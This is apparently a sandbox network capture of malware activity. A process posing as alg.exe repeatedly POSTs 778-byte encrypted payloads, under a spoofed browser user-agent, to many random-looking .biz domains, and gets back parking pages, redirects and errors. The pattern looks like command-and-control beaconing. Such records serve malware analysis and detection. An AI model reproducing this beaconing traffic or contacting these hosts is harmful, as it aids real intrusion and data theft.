Dec 31, 2024 09:06:00.557656050 CET	778	OUT	Data Raw: 51 29 39 69 2b a1 fa f0 fe 02 00 00 12 cf e5 f4 7f dc 79 8f 84 62 6b 44 10 87 52 ba d5 9f a6 42 82 db 5e 4d 2b 0e 19 f4 d6 be fc cc 39 21 fe c3 f1 74 63 9d 85 db c7 3a 6a 55 38 18 dd 8d 14 6d 18 20 19 f2 ff 4f 0c 39 42 bf 97 da ae 82 25 ff cb 70 Data Ascii: Q)9i+ybkDRB^M+9!tc:jU8m O9B%p\|>9\|=xa2Jkuw4TT%Kw6c u"d?~noB5o%H;2Km!\|Vm-]fDfMJI[nF}O8;yA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49789	47.129.31.212	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:03.100650072 CET	345	OUT	POST /ld HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:03.100662947 CET	778	OUT	Data Raw: b4 3f e6 89 88 c0 aa ab fe 02 00 00 88 65 30 1b 62 a9 4c 7d 5f 86 6b 7b b2 de 59 4c 66 3c 97 e3 2a 76 f3 c5 6e 0e 6a c8 f8 22 3e f0 b3 f0 43 08 4c 6f a8 ba ab 3c 24 8a 76 5e c1 15 12 27 53 e6 56 b3 a4 33 c9 bc ea 44 58 74 82 16 6d f7 ef 1b b1 2d Data Ascii: ?e0bL}_k{YLf<vnj">CLo<$v^'SV3DXtm-'PL!eoQq}xc#e])zw,\|S}9D?/1I}Q9tZ3I{>/jP~_}(9#wR3qdIG/rqY8XA
Dec 31, 2024 09:06:04.471400023 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=bf50e745d1263329bb9e7a9009c44c30\|8.46.123.189\|1735632364\|1735632364\|0\|1\|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49800	13.251.16.150	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:05.049498081 CET	357	OUT	POST /kcogybxqholgdpl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:05.049525023 CET	778	OUT	Data Raw: cc 17 b2 21 02 06 76 61 fe 02 00 00 35 19 65 74 86 57 84 c5 18 63 4d 8c 22 b3 ff 26 61 77 ba 1f 00 fc 31 8b 1f 73 d9 1a 88 a7 2c 13 a8 a6 55 a3 10 82 6d 3c a3 c2 13 e6 97 6d 62 4a 14 b9 7c 2a 96 d1 28 19 a2 bf e1 ce f5 79 14 f8 0b 58 63 fb b7 ff Data Ascii: !va5etWcM"&aw1s,Um<mbJ\|*(yXc,oIzqy)^]'sp~zFI?E{'6%~J}hBj=nvM3@~xveA^~XbQ2P%O2&O%?:f
Dec 31, 2024 09:06:06.433348894 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=31efdc04e6706f82fe1ae223fff3a39d\|8.46.123.189\|1735632366\|1735632366\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49811	44.221.84.105	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:07.071906090 CET	346	OUT	POST /k HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:07.071949959 CET	778	OUT	Data Raw: cd 4d a3 ce b4 fc a8 c8 fe 02 00 00 be 17 74 ab 20 f0 42 5d 0a b9 4f ed e3 15 8d fb 5b b1 cc a3 56 4a 6d 73 d8 c2 f7 fb e6 1b 98 91 84 4a 91 47 f8 fa dd 79 bd 5e 0a c3 2c 97 13 c6 19 7f 4d 76 4d c7 68 14 b4 19 3d 90 aa 53 62 ce c7 a6 44 82 18 4e Data Ascii: Mt B]O[VJmsJGy^,MvMh=SbDNk=Bz:9hEg$JbV/Tg}Elp\|}i*cD M wdno,Fkld($fA[
Dec 31, 2024 09:06:07.499385118 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3087a78f4888064d04bb8406c53de761\|8.46.123.189\|1735632367\|1735632367\|0\|1\|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49816	18.141.10.107	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:07.642390013 CET	345	OUT	POST /we HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:07.642425060 CET	778	OUT	Data Raw: 10 d6 b1 cb ee e2 df 90 fe 02 00 00 09 c2 7c 40 bd 3c 65 69 0a 5c 71 d6 b9 2c a9 c7 0d 2b 96 9d 09 97 d7 65 d7 d2 fe e4 92 51 70 01 d9 5a d2 67 8e 52 1a 02 7f 4d 82 44 08 57 a9 cd 51 33 2e 82 fb 67 79 43 77 28 ec e2 d5 c0 df c4 e8 03 c2 db 29 7f Data Ascii: \|@<ei\q,+eQpZgRMDWQ3.gyCw()RN2SiAPu1"a5~^AqzW-4OJZ/0cO79Sf-(F_ yiPmIGc4b5Om/NFmRa?Yx7{
Dec 31, 2024 09:06:09.000380039 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5d79a31b6d0b7f0e0a2f14e9fe501460\|8.46.123.189\|1735632368\|1735632368\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49827	72.52.178.23	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:09.143364906 CET	342	OUT	POST /m HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:09.143390894 CET	778	OUT	Data Raw: 7b 33 27 a5 09 75 dc 59 fe 02 00 00 b0 da d4 21 7d 4e 76 5f 6e 8c c7 65 66 2f 3f 33 69 77 a7 40 00 ed 58 e2 3e 6c 20 93 46 53 a0 f2 13 54 62 a7 08 ed d2 e9 6f 4d 8b ff ad a1 39 1e c4 25 fb a3 bd e6 2a 26 23 bc 3f 0a 6a 09 ff 3b bb 8f ea 88 64 e7 Data Ascii: {3'uY!}Nv_nef/?3iw@X>l FSTboM9%&#?j;d01Tup4}U\R8Ge_\|9Icq{)QscZv!LEd\|5,GA[$Hl\|`O,F*>D/b!gyIU,~hP4
Dec 31, 2024 09:06:09.671380043 CET	273	IN	HTTP/1.1 302 Moved Temporarily Date: Tue, 31 Dec 2024 08:06:09 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.fwiwk.biz/m?usid=27&utid=10221880067 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Dec 31, 2024 09:06:10.410396099 CET	343	OUT	POST /mt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:10.410396099 CET	778	OUT	Data Raw: d5 34 93 35 7d c8 6e 1b fe 02 00 00 ea f2 76 84 99 a1 d0 22 ad 96 da 2b 81 99 91 27 dd 34 4d 60 40 4d 52 7a 25 c3 74 06 09 7b 2b 8d ff 83 fb d7 02 b3 ec 89 bd 01 64 74 26 03 65 34 47 43 c8 31 95 9c 2b c6 6e 51 04 26 c4 32 35 a2 a7 f2 09 da b0 ff Data Ascii: 45}nv"+'4M`@MRz%t{+dt&e4GC1+nQ&25O<w07?VBkx^amuSOCjdF{=WO{f;OfvQm/.Acjaz9U8 +LY6t>z}k3\J
Dec 31, 2024 09:06:10.556740999 CET	274	IN	HTTP/1.1 302 Moved Temporarily Date: Tue, 31 Dec 2024 08:06:10 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.fwiwk.biz/mt?usid=27&utid=10221880299 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49831	199.59.243.227	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:09.797213078 CET	349	OUT	GET /m?usid=27&utid=10221880067 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.fwiwk.biz
Dec 31, 2024 09:06:10.276500940 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 31 Dec 2024 08:06:10 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 960e66a7-bb52-4fb3-ac3d-e8687c65912d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VNFTFMvMkSJL9ZC2T3x26YYzdQKWtjzneXuzZ3ga+PtJEaP5A0Dp0Rjyg4veNFTSs0eKw07gX9hNBbt6fvTbZw== set-cookie: parking_session=960e66a7-bb52-4fb3-ac3d-e8687c65912d; expires=Tue, 31 Dec 2024 08:21:10 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4e 46 54 46 4d 76 4d 6b 53 4a 4c 39 5a 43 32 54 33 78 32 36 59 59 7a 64 51 4b 57 74 6a 7a 6e 65 58 75 7a 5a 33 67 61 2b 50 74 4a 45 61 50 35 41 30 44 70 30 52 6a 79 67 34 76 65 4e 46 54 53 73 30 65 4b 77 30 37 67 58 39 68 4e 42 62 74 36 66 76 54 62 5a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VNFTFMvMkSJL9ZC2T3x26YYzdQKWtjzneXuzZ3ga+PtJEaP5A0Dp0Rjyg4veNFTSs0eKw07gX9hNBbt6fvTbZw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Dec 31, 2024 09:06:10.276513100 CET	560	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTYwZTY2YTctYmI1Mi00ZmIzLWFjM2QtZTg2ODdjNjU5MTJkIiwicGFnZV90aW1lIjoxNzM1NjMyMzcwLCJwYWdlX3VybCI6I
Dec 31, 2024 09:06:10.557439089 CET	350	OUT	GET /mt?usid=27&utid=10221880299 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.fwiwk.biz
Dec 31, 2024 09:06:10.663001060 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 31 Dec 2024 08:06:09 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 58923a26-6cc3-48c6-8448-e22fa0f8cc90 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_myjMjjOsMgF7dNpkCvMO44aX5xVJAftG+O1Gi7Pr4e+XvWBOYKOCZ0jde2FL0d0N89fLhYn/D93ub/Ijs1ASrg== set-cookie: parking_session=58923a26-6cc3-48c6-8448-e22fa0f8cc90; expires=Tue, 31 Dec 2024 08:21:10 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 79 6a 4d 6a 6a 4f 73 4d 67 46 37 64 4e 70 6b 43 76 4d 4f 34 34 61 58 35 78 56 4a 41 66 74 47 2b 4f 31 47 69 37 50 72 34 65 2b 58 76 57 42 4f 59 4b 4f 43 5a 30 6a 64 65 32 46 4c 30 64 30 4e 38 39 66 4c 68 59 6e 2f 44 39 33 75 62 2f 49 6a 73 31 41 53 72 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_myjMjjOsMgF7dNpkCvMO44aX5xVJAftG+O1Gi7Pr4e+XvWBOYKOCZ0jde2FL0d0N89fLhYn/D93ub/Ijs1ASrg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Dec 31, 2024 09:06:10.663018942 CET	560	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg5MjNhMjYtNmNjMy00OGM2LTg0NDgtZTIyZmEwZjhjYzkwIiwicGFnZV90aW1lIjoxNzM1NjMyMzcwLCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49840	34.246.200.160	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:10.846945047 CET	348	OUT	POST /bilswy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:10.846945047 CET	778	OUT	Data Raw: 7f b2 20 f3 91 24 15 76 fe 02 00 00 37 ba e7 cd 27 cc 76 2f a3 b1 ae d5 a7 36 0d 49 dd 8a 22 2f 67 ea 2b 37 9a 10 5a 21 8b f0 c0 59 e3 9d 7a 01 97 1e 26 7e e1 37 91 18 06 db cc 38 b4 0a 8e 55 4d 69 18 d0 77 53 b9 9c 32 6f e4 e2 d1 ae 3f 06 c7 09 Data Ascii: $v7'v/6I"/g+7Z!Yz&~78UMiwS2o?)8[>W# 8?7{\|Q%jlMVG-vp-)[4bdm6H%Yyoq7rEdN9onN$]8r)}4I;t1N}JzB\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49841	34.246.200.160	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:11.038718939 CET	345	OUT	POST /nrp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:11.038765907 CET	778	OUT	Data Raw: 62 40 38 47 24 a5 49 94 fe 02 00 00 15 23 9e 8b 04 e6 04 cc b4 97 6e 5f fd 94 89 48 72 9e d9 bc 09 a7 58 8a 84 96 57 77 53 fb cd 73 52 36 35 37 07 9b 43 bf 33 29 cf fe 54 08 d7 a2 e4 25 52 a3 34 e0 e9 65 87 96 22 db 4e ef e8 52 b3 58 36 1e 05 94 Data Ascii: b@8G$I#n_HrXWwSsR657C3)T%R4e"NRX6fPD<r.Kg@\GD/eBdzE)K\|p63e`IN6]oQjTv8$uo6 R:ty%mwq"~<Dg,Dx,F
Dec 31, 2024 09:06:11.786493063 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a46c3b77f3164adcefe8072c087a3a5b\|8.46.123.189\|1735632371\|1735632371\|0\|1\|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49847	34.227.7.138	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:11.883486986 CET	346	OUT	POST /lgyfu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:11.883498907 CET	778	OUT	Data Raw: 3d 08 04 ed c7 e4 3f 06 fe 02 00 00 87 96 23 19 65 98 c3 5a da 87 45 fd d5 1f e4 ec 5b 9e 0f 78 5c 6f 12 71 fe bc 2b 4f cf 68 9f 89 2e ec 40 8f a9 7f 12 b2 96 fd 4c 68 d0 79 55 eb 29 80 06 a6 8d 7d 43 23 74 0e da 14 f0 7f 59 4e 88 3a 7f 13 1f d1 Data Ascii: =?#eZE[x\oq+Oh.@LhyU)}C#tYN:?Sza4F&#mkUD+5e37WHGf]uM(1e\_^CyHvyS!au5UyXy=X`!@2HC
Dec 31, 2024 09:06:12.339238882 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=00108d841e2594b73e707c30c16b6955\|8.46.123.189\|1735632372\|1735632372\|0\|1\|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49853	208.117.43.225	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:12.524959087 CET	351	OUT	POST /mblybww HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:12.524979115 CET	778	OUT	Data Raw: 2f a4 e6 ea 75 41 01 06 fe 02 00 00 f0 7c 26 85 84 1b 33 bc a5 fb 67 5e 80 4f 92 7c d4 ea 35 f0 bc 51 0a 4a 9b 60 d5 c2 31 6b d1 a8 c4 88 24 a4 a6 65 e1 97 bf cd 9a 62 a8 95 75 59 ff 8e 14 1e 5e 53 42 b6 c3 67 08 c8 b0 1a 76 fd f2 7d 2c 66 2c 8b Data Ascii: /uA\|&3g^O\|5QJ`1k$ebuY^SBgv},f,e1e\?B\|i$$XS3/s=`f#}vRebm_}~vuQ!s@`mxP<Ucl>xyoq>7NbQ%D1m@%I64X\u
Dec 31, 2024 09:06:13.006155968 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:06:12 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
